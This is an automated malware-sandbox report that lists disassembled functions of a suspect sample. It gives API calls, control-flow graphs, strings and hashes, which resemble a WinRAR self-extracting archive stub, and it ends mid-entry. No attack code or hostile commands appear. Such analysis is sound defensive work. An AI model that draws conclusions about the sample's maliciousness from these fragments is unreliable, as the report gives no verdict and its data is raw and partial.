                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0043B960
                                                              • GetDlgItem.USER32(?,00000068), ref: 0043B983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043B99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004535F4), ref: 0043B9B1
                                                                • Part of subcall function 0043D453: _wcschr.LIBVCRUNTIME ref: 0043D45C
                                                                • Part of subcall function 0043D453: _wcslen.LIBCMT ref: 0043D47D
                                                              • SetFocus.USER32(00000000), ref: 0043B9B8
                                                              • _swprintf.LIBCMT ref: 0043BA24
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                                • Part of subcall function 0043D4D4: GetDlgItem.USER32(00000068,0047FCB8), ref: 0043D4E8
                                                                • Part of subcall function 0043D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0043AF07,00000001,?,?,0043B7B9,0045506C,0047FCB8,0047FCB8,00001000,00000000,00000000), ref: 0043D510
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043D51B
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004535F4), ref: 0043D529
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D53F
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0043D559
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D59D
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0043D5AB
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D5BA
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D5E1
                                                                • Part of subcall function 0043D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004543F4), ref: 0043D5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0043BA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0043BA90
                                                              • GetTickCount.KERNEL32 ref: 0043BAAE
                                                              • _swprintf.LIBCMT ref: 0043BAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 0043BAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0043BB43
                                                              • _swprintf.LIBCMT ref: 0043BB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0043BBD0
                                                              • GetCommandLineW.KERNEL32 ref: 0043BBEA
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0043BC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0043BC6F
                                                              • Sleep.KERNEL32(00000064), ref: 0043BCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0043BCE2
                                                              • CloseHandle.KERNEL32(00000000), ref: 0043BCEB
                                                              • _swprintf.LIBCMT ref: 0043BD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043BD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,004535F4), ref: 0043BD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 0043BD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0043BDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0043BDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043BE68
                                                              • _wcslen.LIBCMT ref: 0043BEBE
                                                              • _swprintf.LIBCMT ref: 0043BEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0043BF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0043BF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 0043BF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0043BF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 0043BF85
                                                              • SetWindowTextW.USER32(00000000,0046A472), ref: 0043BFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0043C007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043C01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0043C0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0043C197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0043C1D9
                                                                • Part of subcall function 0043C73F: __EH_prolog.LIBCMT ref: 0043C744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0043C1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<C$STARTDLG$^C$__tmp_rar_sfx_access_check_%u$hC$winrarsfxmappingfile.tmp$QE
                                                              • API String ID: 3829768659-76735193
                                                              • Opcode ID: 6f1aff7a0a8bbe25b9fc51cea1ea52ed714ace5da278914dc129a5f50c707982
                                                              • Instruction ID: 25c1a18b62a10a52d22257ccced6d028f09b6b53c0fc67a6c72c139df0f22fe1
                                                              • Opcode Fuzzy Hash: 6f1aff7a0a8bbe25b9fc51cea1ea52ed714ace5da278914dc129a5f50c707982
                                                              • Instruction Fuzzy Hash: EA42F570940254BEEB219B719C4AFBF376CAB09B05F00116BF644B61D2DBBC5E448B6E
                                                              Function 00430863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 269 430863-430886 call 43ec50 GetModuleHandleW 272 4308e7-430b48 269->272 273 430888-43089f GetProcAddress 269->273 276 430c14-430c40 GetModuleFileNameW call 42c29a call 430602 272->276 277 430b4e-430b59 call 4475fb 272->277 274 4308a1-4308b7 273->274 275 4308b9-4308c9 GetProcAddress 273->275 274->275 278 4308e5 275->278 279 4308cb-4308e0 275->279 291 430c42-430c4e call 42b146 276->291 277->276 285 430b5f-430b8d GetModuleFileNameW CreateFileW 277->285 278->272 279->278 289 430c08-430c0f CloseHandle 285->289 290 430b8f-430b9b SetFilePointer 285->290 289->276 290->289 292 430b9d-430bb9 ReadFile 290->292 298 430c50-430c5b call 43081b 291->298 299 430c7d-430ca4 call 42c310 GetFileAttributesW 291->299 292->289 295 430bbb-430be0 292->295 297 430bfd-430c06 call 430371 295->297 297->289 306 430be2-430bfc call 43081b 297->306 298->299 308 430c5d-430c7b CompareStringW 298->308 309 430ca6-430caa 299->309 310 430cae 299->310 306->297 308->299 308->309 309->291 312 430cac 309->312 313 430cb0-430cb5 310->313 312->313 314 430cb7 313->314 315 430cec-430cee 313->315 316 430cb9-430ce0 call 42c310 GetFileAttributesW 314->316 317 430cf4-430d0b call 42c2e4 call 42b146 315->317 318 430dfb-430e05 315->318 323 430ce2-430ce6 316->323 324 430cea 316->324 328 430d73-430da6 call 424092 AllocConsole 317->328 329 430d0d-430d6e call 43081b * 2 call 42e617 call 424092 call 42e617 call 43a7e4 317->329 323->316 326 430ce8 323->326 324->315 326->315 334 430df3-430df5 ExitProcess 328->334 335 430da8-430ded GetCurrentProcessId AttachConsole call 443e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->335 329->334 335->334
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0043087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0043088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004308BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00430B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00430B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00430B93
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,|<E,00000000), ref: 00430BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00430C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00430C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<E,?,00000000,?,00000800), ref: 00430C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,|<E,00000800,?,00000000,?,00000800), ref: 00430C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,D=E,00000800), ref: 00430CD8
                                                                • Part of subcall function 0043081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00430836
                                                                • Part of subcall function 0043081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0042F2D8,Crypt32.dll,00000000,0042F35C,?,?,0042F33E,?,?,?), ref: 00430858
                                                              • _swprintf.LIBCMT ref: 00430D4A
                                                              • _swprintf.LIBCMT ref: 00430D96
                                                                • Part of subcall function 00424092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004240A5
                                                              • AllocConsole.KERNEL32 ref: 00430D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00430DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00430DAF
                                                              • _wcslen.LIBCMT ref: 00430DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00430DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00430DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00430DE7
                                                              • FreeConsole.KERNEL32 ref: 00430DED
                                                              • ExitProcess.KERNEL32 ref: 00430DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: (=E$,<E$,@E$0?E$0AE$4BE$8>E$D=E$DXGIDebug.dll$H?E$H@E$HAE$P>E$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=E$`@E$d?E$dAE$dwmapi.dll$h=E$h>E$kernel32$uxtheme.dll$|<E$|?E$|@E$<E$>E$?E$@E$AE
                                                              • API String ID: 1207345701-976991200
                                                              • Opcode ID: d7c879ffad46ee6c7a50f746746c41765999fdc01d7f57a130a21c4d86b2d644
                                                              • Instruction ID: 8c7ae804b1468caff33ffe662d6dd5588c606d7889e9ca4e26e3ad3569df656e
                                                              • Opcode Fuzzy Hash: d7c879ffad46ee6c7a50f746746c41765999fdc01d7f57a130a21c4d86b2d644
                                                              • Instruction Fuzzy Hash: 3DD1A5B1008344ABD321DF50C859B9FBBF8AB8574BF50991FF9859A242C778864CCB5E
                                                              Function 0043C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 348 43c73f-43c757 call 43eb78 call 43ec50 353 43d40d-43d418 348->353 354 43c75d-43c787 call 43b314 348->354 354->353 357 43c78d-43c792 354->357 358 43c793-43c7a1 357->358 359 43c7a2-43c7b7 call 43af98 358->359 362 43c7b9 359->362 363 43c7bb-43c7d0 call 431fbb 362->363 366 43c7d2-43c7d6 363->366 367 43c7dd-43c7e0 363->367 366->363 368 43c7d8 366->368 369 43c7e6 367->369 370 43d3d9-43d404 call 43b314 367->370 368->370 372 43ca5f-43ca61 369->372 373 43c9be-43c9c0 369->373 374 43c7ed-43c7f0 369->374 375 43ca7c-43ca7e 369->375 370->358 381 43d40a-43d40c 370->381 372->370 376 43ca67-43ca77 SetWindowTextW 372->376 373->370 379 43c9c6-43c9d2 373->379 374->370 380 43c7f6-43c850 call 43a64d call 42bdf3 call 42a544 call 42a67e call 426edb 374->380 375->370 378 43ca84-43ca8b 375->378 376->370 378->370 382 43ca91-43caaa 378->382 383 43c9e6-43c9eb 379->383 384 43c9d4-43c9e5 call 447686 379->384 437 43c98f-43c9a4 call 42a5d1 380->437 381->353 389 43cab2-43cac0 call 443e13 382->389 390 43caac 382->390 387 43c9f5-43ca00 call 43b48e 383->387 388 43c9ed-43c9f3 383->388 384->383 394 43ca05-43ca07 387->394 388->394 389->370 402 43cac6-43cacf 389->402 390->389 400 43ca12-43ca32 call 443e13 call 443e3e 394->400 401 43ca09-43ca10 call 443e13 394->401 425 43ca34-43ca3b 400->425 426 43ca4b-43ca4d 400->426 401->400 406 43cad1-43cad5 402->406 407 43caf8-43cafb 402->407 411 43cb01-43cb04 406->411 412 43cad7-43cadf 406->412 407->411 414 43cbe0-43cbee call 430602 407->414 419 43cb11-43cb2c 411->419 420 43cb06-43cb0b 411->420 412->370 417 43cae5-43caf3 call 430602 412->417 429 43cbf0-43cc04 call 44279b 414->429 417->429 438 43cb76-43cb7d 419->438 439 43cb2e-43cb68 419->439 420->414 420->419 427 43ca42-43ca4a call 447686 425->427 428 43ca3d-43ca3f 425->428 426->370 430 43ca53-43ca5a call 443e2e 426->430 427->426 428->427 447 43cc11-43cc62 call 430602 call 43b1be GetDlgItem SetWindowTextW SendMessageW call 443e49 429->447 448 43cc06-43cc0a 429->448 430->370 454 43c855-43c869 SetFileAttributesW 437->454 455 43c9aa-43c9b9 call 42a55a 437->455 441 43cbab-43cbce call 443e13 * 2 438->441 442 43cb7f-43cb97 call 443e13 438->442 465 43cb6a 439->465 466 43cb6c-43cb6e 439->466 441->429 476 43cbd0-43cbde call 4305da 441->476 442->441 459 43cb99-43cba6 call 4305da 442->459 481 43cc67-43cc6b 447->481 448->447 453 43cc0c-43cc0e 448->453 453->447 460 43c90f-43c91f GetFileAttributesW 454->460 461 43c86f-43c8a2 call 42b991 call 42b690 call 443e13 454->461 455->370 459->441 460->437 471 43c921-43c930 DeleteFileW 460->471 491 43c8b5-43c8c3 call 42bdb4 461->491 492 43c8a4-43c8b3 call 443e13 461->492 465->466 466->438 471->437 475 43c932-43c935 471->475 477 43c939-43c965 call 424092 GetFileAttributesW 475->477 476->429 489 43c937-43c938 477->489 490 43c967-43c97d MoveFileW 477->490 481->370 485 43cc71-43cc85 SendMessageW 481->485 485->370 489->477 490->437 493 43c97f-43c989 MoveFileExW 490->493 491->455 498 43c8c9-43c908 call 443e13 call 43fff0 491->498 492->491 492->498 493->437 498->460
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0043C744
                                                                • Part of subcall function 0043B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0043B3FB
                                                                • Part of subcall function 0043AF98: _wcschr.LIBVCRUNTIME ref: 0043B033
                                                              • _wcslen.LIBCMT ref: 0043CA0A
                                                              • _wcslen.LIBCMT ref: 0043CA13
                                                              • SetWindowTextW.USER32(?,?), ref: 0043CA71
                                                              • _wcslen.LIBCMT ref: 0043CAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 0043CBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 0043CC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0043CC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,0046A472), ref: 0043CC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0043CC7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$<C$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$C
                                                              • API String ID: 986293930-154417772
                                                              • Opcode ID: 7e0a01ed817db9bd5dfc9fc2d50b0ce2d06dc278f5b5b67dae0ddb5136def968
                                                              • Instruction ID: 99bcfaf7b6b88d183cc64c69be7566cbc43b92583e99ca806a8c2c2475466cc5
                                                              • Opcode Fuzzy Hash: 7e0a01ed817db9bd5dfc9fc2d50b0ce2d06dc278f5b5b67dae0ddb5136def968
                                                              • Instruction Fuzzy Hash: E6E186B2900218AADF24DB61DC85EEF73BC9F08751F5050ABF945E7140EB789E848F69
                                                              Function 0042DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042DA70
                                                              • _wcschr.LIBVCRUNTIME ref: 0042DA91
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0042DAAC
                                                                • Part of subcall function 0042C29A: _wcslen.LIBCMT ref: 0042C2A2
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                                • Part of subcall function 00431B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0042BAE9,00000000,?,?,?,00010484), ref: 00431BA0
                                                              • _wcslen.LIBCMT ref: 0042DDE9
                                                              • __fprintf_l.LIBCMT ref: 0042DF1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9E
                                                              • API String ID: 557298264-3123697929
                                                              • Opcode ID: 7d7832be701759e19d170f6313ce2fba25e8094586f139b44f22764c2e070117
                                                              • Instruction ID: e2d1f5800a67539c2a8a3aba26d4bcd02a5c2a0805af0cba79b5ef39b816db46
                                                              • Opcode Fuzzy Hash: 7d7832be701759e19d170f6313ce2fba25e8094586f139b44f22764c2e070117
                                                              • Instruction Fuzzy Hash: B532E371A00228EBDF24EF65E841BEE77A4FF05704F90016BF90597281EBB99D85CB58
                                                              Function 0043D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0043B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B579
                                                                • Part of subcall function 0043B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043B58A
                                                                • Part of subcall function 0043B568: IsDialogMessageW.USER32(00010484,?), ref: 0043B59E
                                                                • Part of subcall function 0043B568: TranslateMessage.USER32(?), ref: 0043B5AC
                                                                • Part of subcall function 0043B568: DispatchMessageW.USER32(?), ref: 0043B5B6
                                                              • GetDlgItem.USER32(00000068,0047FCB8), ref: 0043D4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0043AF07,00000001,?,?,0043B7B9,0045506C,0047FCB8,0047FCB8,00001000,00000000,00000000), ref: 0043D510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0043D51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004535F4), ref: 0043D529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0043D559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0043D5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0043D5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0043D5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004543F4), ref: 0043D5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: e723093fb9db128184b687543f88070a483748ef5f541d17f80a2008d9769c13
                                                              • Instruction ID: 3d8fe9ba195288c210bba02b37d1e9e0d4c01febecddd9b579a2f21675a87c9c
                                                              • Opcode Fuzzy Hash: e723093fb9db128184b687543f88070a483748ef5f541d17f80a2008d9769c13
                                                              • Instruction Fuzzy Hash: 7431B271145341BBD301DF209C4AFAF7BACEB86B0AF00492DF951961D1EB648A04877F
                                                              Function 0043D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 838 43d78f-43d7a7 call 43ec50 841 43d9e8-43d9f0 838->841 842 43d7ad-43d7b9 call 443e13 838->842 842->841 845 43d7bf-43d7e7 call 43fff0 842->845 848 43d7f1-43d7ff 845->848 849 43d7e9 845->849 850 43d812-43d818 848->850 851 43d801-43d804 848->851 849->848 852 43d85b-43d85e 850->852 853 43d808-43d80e 851->853 852->853 856 43d860-43d866 852->856 854 43d810 853->854 855 43d837-43d844 853->855 857 43d822-43d82c 854->857 858 43d9c0-43d9c2 855->858 859 43d84a-43d84e 855->859 860 43d868-43d86b 856->860 861 43d86d-43d86f 856->861 862 43d81a-43d820 857->862 863 43d82e 857->863 864 43d9c6 858->864 859->864 865 43d854-43d859 859->865 860->861 866 43d882-43d898 call 42b92d 860->866 861->866 867 43d871-43d878 861->867 862->857 869 43d830-43d833 862->869 863->855 872 43d9cf 864->872 865->852 873 43d8b1-43d8bc call 42a231 866->873 874 43d89a-43d8a7 call 431fbb 866->874 867->866 870 43d87a 867->870 869->855 870->866 875 43d9d6-43d9d8 872->875 884 43d8d9-43d8dd 873->884 885 43d8be-43d8d5 call 42b6c4 873->885 874->873 883 43d8a9 874->883 878 43d9e7 875->878 879 43d9da-43d9dc 875->879 878->841 879->878 882 43d9de-43d9e1 ShowWindow 879->882 882->878 883->873 888 43d8e4-43d8e6 884->888 885->884 888->878 889 43d8ec-43d8f9 888->889 890 43d8fb-43d902 889->890 891 43d90c-43d90e 889->891 890->891 892 43d904-43d90a 890->892 893 43d910-43d919 891->893 894 43d925-43d944 call 43dc3b 891->894 892->891 895 43d97b-43d987 CloseHandle 892->895 893->894 902 43d91b-43d923 ShowWindow 893->902 894->895 908 43d946-43d94e 894->908 896 43d989-43d996 call 431fbb 895->896 897 43d998-43d9a6 895->897 896->872 896->897 897->875 901 43d9a8-43d9aa 897->901 901->875 905 43d9ac-43d9b2 901->905 902->894 905->875 907 43d9b4-43d9be 905->907 907->875 908->895 909 43d950-43d961 GetExitCodeProcess 908->909 909->895 910 43d963-43d96d 909->910 911 43d974 910->911 912 43d96f 910->912 911->895 912->911
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0043D7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 0043D8DE
                                                              • ShowWindow.USER32(?,00000000), ref: 0043D91D
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0043D959
                                                              • CloseHandle.KERNEL32(?), ref: 0043D97F
                                                              • ShowWindow.USER32(?,00000001), ref: 0043D9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                              • String ID: .exe$.inf$PDu<C$hC$rC
                                                              • API String ID: 36480843-3641375243
                                                              • Opcode ID: 1e89d63cc8de9449cc0a0021dc507f594e25a6f6e408b706f1a0b0794d1a19d1
                                                              • Instruction ID: aeb9d06a19033eb0b8d996b01c7f3a04b84d116a56906ec4f1c807f00a8bd21e
                                                              • Opcode Fuzzy Hash: 1e89d63cc8de9449cc0a0021dc507f594e25a6f6e408b706f1a0b0794d1a19d1
                                                              • Instruction Fuzzy Hash: 6C51F8B09043809AD731AF24F8447AB7BE4AF49744F04282FF9C597291E7789D84CB5E
                                                              Function 0044A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
